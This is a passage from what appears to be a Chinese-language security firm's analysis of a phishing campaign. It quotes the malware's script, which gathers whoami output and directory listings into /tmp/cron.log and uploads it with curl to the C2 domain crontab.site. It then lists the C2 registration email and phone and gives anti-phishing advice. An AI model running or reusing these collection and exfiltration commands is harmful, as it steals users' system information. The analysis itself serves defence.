); whoami >> /tmp/cron.logls -al /Users/ >> /tmp/cron.logls -al $HOMEDIR >> /tmp/cron.logcurl --data-binary "@/tmp/cron.log" http://crontab.site/?log=startup&key;=cron.log&id;=$UID
大致流程 通过以上一些列操作,从而盗取用户隐私信息。 备注: C2 信息:crontab.site 邮箱 alashanvinov@yandex.ru phone_tag +7.9453949549 注册时间 2020-04-20 17:47:03 过期时间 2021-04-20 23:59:59 更新时间 2020-04-20 17:47:04 慢雾建议 针对本次攻击事件慢雾安全团队建议: 认清官方邮箱后缀 谨慎对待未知来源邮件里的链接与附件 怀疑一切以「升级」、「账号异常」等理由的邮件 对于需要处理但可疑的邮件内容,需及时咨询专业人员 (责任编辑:admin1) |